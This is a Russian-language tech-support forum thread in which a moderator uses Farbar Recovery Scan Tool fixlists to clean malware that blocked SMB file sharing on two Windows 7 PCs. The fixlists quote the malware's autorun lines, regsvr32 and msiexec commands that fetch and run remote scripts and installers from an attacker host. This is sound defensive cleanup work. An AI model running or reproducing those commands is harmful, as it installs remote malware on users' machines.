none
[Решено] Пропал доступ к сетевой папке RRS feed

  • Вопрос

  • Доброго времени суток. Имею следующую проблему. Есть два компа под управлением win 7 home basic x86. На обоих были расшарены по одной папке. Вчера оба словили вирус conhost в загрузочный сектор диска. Удалось их убрать только после загрузки с флешки Kaspersky rescue disk и последующей проверки KVRT. После изцеления у обеих машин пропал доступ к сетевой папке из локальной сети. Пинг есть и по IP и по имени. Брандмауэр и антивирус отключен. Сетевое обнаружение включено, доступ к файлам и папкам без пароля включён. Служба сервер и рабочая станция работают, при перезапуске ошибок не выдают. Служба браузер компьютера работает. Единственное что не работает это команда nslookup. Выдаёт следующее: nslookup 192.168.0.168 non-existent domain. Прошу помощи, убил один день в попытке разобраться.

    Nslookup удалось победить, если клиентской машине дать адрес из DHCP. Но расшаренные папки так и не появились((.



    • Изменено ДмитрийЛТД 26 сентября 2018 г. 13:13
    • Изменено SQxModerator 3 октября 2018 г. 2:40 добавил в название темы "[Решено]"
    26 сентября 2018 г. 12:48

Ответы

  • ПК 1:

    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{05a038c8-4c09-47ad-923b-c96297b85a72} <==== ATTENTION (Restriction - IP)
    Toolbar: HKU\S-1-5-21-2171072972-1416449279-2354408346-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} -  No File
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    CHR HKLM\...\Chrome\Extension: [amkpcclbbgegoafihnpgomddadjhcadd] - hxxps://chrome.google.com/webstore/detail/amkpcclbbgegoafihnpgomddadjhcadd
    CHR HKLM-x32\...\Chrome\Extension: [amkpcclbbgegoafihnpgomddadjhcadd] - hxxps://chrome.google.com/webstore/detail/amkpcclbbgegoafihnpgomddadjhcadd
    File: C:\Program Files\Common Files\xpdown.dat
    File: C:\Program Files\Common Files\xp.dat
    2018-09-25 13:42 - 2018-09-25 13:52 - 000000000 ____D C:\Users\Public\Documents\RegRunInfo
    2018-09-25 13:42 - 2018-09-25 13:42 - 000000000 ____D C:\Users\Все пользователи\RegRun
    2018-09-25 13:42 - 2018-09-25 13:42 - 000000000 ____D C:\ProgramData\RegRun
    2018-09-25 13:41 - 2018-09-25 13:56 - 000000000 ____D C:\Program Files (x86)\UnHackMe
    2018-09-25 13:41 - 2018-09-25 13:53 - 000000000 ____D C:\Users\User\Documents\RegRun2
    MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.ftp0118.info:280/v.sct scrobj.dll
    MSCONFIG\startupreg: start1 => msiexec.exe /i http://js.ftp0118.info:280/helloworld.msi /q
    FirewallRules: [{3FC04CA0-FD60-400B-9632-1CA9FDAF77AE}] => (Block) LPort=445
    FirewallRules: [{F04D8EF4-3824-4174-85DD-00345716FC51}] => (Block) LPort=139
    Reboot:
    •  Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    •  Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.



    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP


    • Изменено SQxModerator 27 сентября 2018 г. 12:58 обновлено
    • Помечено в качестве ответа Vector BCOModerator 28 сентября 2018 г. 6:58
    27 сентября 2018 г. 12:57
    Модератор
  • ПК 2:

    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{749ed03c-a113-4047-8e8d-7c32857ed5b8} <==== ATTENTION (Restriction - IP)
    Toolbar: HKU\S-1-5-21-3831594727-614102330-1408188794-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} -  No File
    Toolbar: HKU\S-1-5-21-3831594727-614102330-1408188794-1000 -> No Name - {C500C267-63BF-451F-8797-4D720C9A2ED9} -  No File
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    File: C:\WINDOWS\mssecsvr.exe
    S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
    File: C:\Program Files\Common Files\xp.dat
    File: C:\Program Files\Common Files\xpdown.dat
    File: C:\Windows\qeriuwjhrf
    Zip: C:\Windows\qeriuwjhrf
    2017-07-11 10:18 - 2016-07-01 14:30 - 001438208 _____ (Setuper) C:\Users\User\AppData\Local\Temp\UnInstallDTO.exe
    MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.ftp0118.info:280/v.sct scrobj.dll
    MSCONFIG\startupreg: start1 => msiexec.exe /i http://js.ftp0118.info:280/helloworld.msi /q
    FirewallRules: [{E2501E93-8638-43C9-AA97-9E375951306A}] => (Block) LPort=445
    FirewallRules: [{A2CC3A81-8175-49C4-87BA-1FEC771C1257}] => (Block) LPort=139
    Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.

    Карантин с рабочего стола вида <data>.zip загрузите этот архив через данную форму.


    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP

    • Помечено в качестве ответа Vector BCOModerator 28 сентября 2018 г. 6:58
    27 сентября 2018 г. 13:06
    Модератор

Все ответы

  • после заражения оптимальным решением проблем является переустановка

    The opinion expressed by me is not an official position of Microsoft

    26 сентября 2018 г. 14:17
    Модератор
  • Здравствуйте Дмитрий,


    1) Уточните пожалуйста какой вирус был найден продуктом KDR?
    2) Предоставите лог сторонней антивирусной утилиты FRST согласно следующей инструкции:
    Важно: обратите внимание, что указанная утилита, может показать возможное использование средств обхода лицензионного соглашения.
    - Скачайте Farbar Recovery Scan Toolи сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

      • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
      • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".

      • Нажмите кнопку Scan.
      • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении в качестве ссылки на скачивания с файлового хранилища (например onedrive).
      • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении в качестве ссылки на скачивания с файлового хранилища (например onedrive).



    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP

    26 сентября 2018 г. 16:36
    Модератор
  • Вчера перед сном тоже подумал, чтобы переустановить систему.
    27 сентября 2018 г. 5:51
  • Про программу FRST не слышал никогда. Логи прилагаю. Папка 1 первый компьютер папка 2 второй.

    Ошибся насчет разрядности. Мои Home Basic оказались 64-битные.



    27 сентября 2018 г. 5:52
  • ПК 1:

    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{05a038c8-4c09-47ad-923b-c96297b85a72} <==== ATTENTION (Restriction - IP)
    Toolbar: HKU\S-1-5-21-2171072972-1416449279-2354408346-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} -  No File
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    CHR HKLM\...\Chrome\Extension: [amkpcclbbgegoafihnpgomddadjhcadd] - hxxps://chrome.google.com/webstore/detail/amkpcclbbgegoafihnpgomddadjhcadd
    CHR HKLM-x32\...\Chrome\Extension: [amkpcclbbgegoafihnpgomddadjhcadd] - hxxps://chrome.google.com/webstore/detail/amkpcclbbgegoafihnpgomddadjhcadd
    File: C:\Program Files\Common Files\xpdown.dat
    File: C:\Program Files\Common Files\xp.dat
    2018-09-25 13:42 - 2018-09-25 13:52 - 000000000 ____D C:\Users\Public\Documents\RegRunInfo
    2018-09-25 13:42 - 2018-09-25 13:42 - 000000000 ____D C:\Users\Все пользователи\RegRun
    2018-09-25 13:42 - 2018-09-25 13:42 - 000000000 ____D C:\ProgramData\RegRun
    2018-09-25 13:41 - 2018-09-25 13:56 - 000000000 ____D C:\Program Files (x86)\UnHackMe
    2018-09-25 13:41 - 2018-09-25 13:53 - 000000000 ____D C:\Users\User\Documents\RegRun2
    MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.ftp0118.info:280/v.sct scrobj.dll
    MSCONFIG\startupreg: start1 => msiexec.exe /i http://js.ftp0118.info:280/helloworld.msi /q
    FirewallRules: [{3FC04CA0-FD60-400B-9632-1CA9FDAF77AE}] => (Block) LPort=445
    FirewallRules: [{F04D8EF4-3824-4174-85DD-00345716FC51}] => (Block) LPort=139
    Reboot:
    •  Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    •  Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.



    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP


    • Изменено SQxModerator 27 сентября 2018 г. 12:58 обновлено
    • Помечено в качестве ответа Vector BCOModerator 28 сентября 2018 г. 6:58
    27 сентября 2018 г. 12:57
    Модератор
  • ПК 2:

    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{749ed03c-a113-4047-8e8d-7c32857ed5b8} <==== ATTENTION (Restriction - IP)
    Toolbar: HKU\S-1-5-21-3831594727-614102330-1408188794-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} -  No File
    Toolbar: HKU\S-1-5-21-3831594727-614102330-1408188794-1000 -> No Name - {C500C267-63BF-451F-8797-4D720C9A2ED9} -  No File
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    File: C:\WINDOWS\mssecsvr.exe
    S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
    File: C:\Program Files\Common Files\xp.dat
    File: C:\Program Files\Common Files\xpdown.dat
    File: C:\Windows\qeriuwjhrf
    Zip: C:\Windows\qeriuwjhrf
    2017-07-11 10:18 - 2016-07-01 14:30 - 001438208 _____ (Setuper) C:\Users\User\AppData\Local\Temp\UnInstallDTO.exe
    MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.ftp0118.info:280/v.sct scrobj.dll
    MSCONFIG\startupreg: start1 => msiexec.exe /i http://js.ftp0118.info:280/helloworld.msi /q
    FirewallRules: [{E2501E93-8638-43C9-AA97-9E375951306A}] => (Block) LPort=445
    FirewallRules: [{A2CC3A81-8175-49C4-87BA-1FEC771C1257}] => (Block) LPort=139
    Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.

    Карантин с рабочего стола вида <data>.zip загрузите этот архив через данную форму.


    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP

    • Помечено в качестве ответа Vector BCOModerator 28 сентября 2018 г. 6:58
    27 сентября 2018 г. 13:06
    Модератор
  • Обратите внимание на Ваших ПК было в правилах Windows Firewall запрещены порты SMB (139, 445). Если вы сами их прописывали, то установите заново эти правила после выполнения фиксов.

    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP

    27 сентября 2018 г. 13:21
    Модератор
  • SQx, файервол, это брандмауэр? Автор говорит, выключен )
    27 сентября 2018 г. 14:03
  • SQx, файервол, это брандмауэр? Автор говорит, выключен )
    Да, но выключен или включен не имеет значения, меня больше интересовало (для статистики), если сам пользователь прописывал эти правила или это выполнило вредоносное ПО. Так как согласно логам, блокировка выполняется в локальной политике.


    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP

    • Изменено SQxModerator 27 сентября 2018 г. 14:31 добавлено
    27 сентября 2018 г. 14:30
    Модератор
  • Правила в firewalle не прописывал, скорее всего это сделал вирус. Не дождался ответа по FRST и переустановил систему на первом ПК. Там проблема исчезла. Борюсь со вторым ПК. Прилагаю.

    Файл карантина загрузил http://virusinfo.info/showthread.php?t=37678


    28 сентября 2018 г. 6:24
  • После прогона FRST с вашим файлом fixlist.txt проблема с доступом решилась. Доступ к папке появился. Большое спасибо за ваше время и знания.
    28 сентября 2018 г. 6:30
  • Объясните ещё пожалуйста мне такой момент, я понял что в фаерволле были прописаны блокирующие правила, FRST их удалила  и доступ появился, но почему они срабатывали, если фаерволл выключен?
    28 сентября 2018 г. 6:59
  • Дмитрий,

    Обратите внимание на следующую строку:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{05a038c8-4c09-47ad-923b-c96297b85a72} <==== ATTENTION (Restriction - IP
    Блокировка была из-за нее, а это блокировка появилась из-за вредоносного ПО, две строки в автозагрузки которое запускало.
    MSCONFIG\startupreg: start => ...
    MSCONFIG\startupreg: start1 => ...


    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP


    • Изменено SQxModerator 28 сентября 2018 г. 11:57 обновлено
    28 сентября 2018 г. 11:57
    Модератор
  • Большое спасибо за поддержку, мой вопрос полностью решён)) Спасибо!
    28 сентября 2018 г. 13:56
  • Рад, что Ваш вопрос был решен, ссылку на логи можете удалить.

    Avis de non-responsabilité:
    Mon opinion ne peut pas coïncider avec la position officielle de Microsoft.

    Bien cordialement, Andrei ...

    MCP

    28 сентября 2018 г. 14:18
    Модератор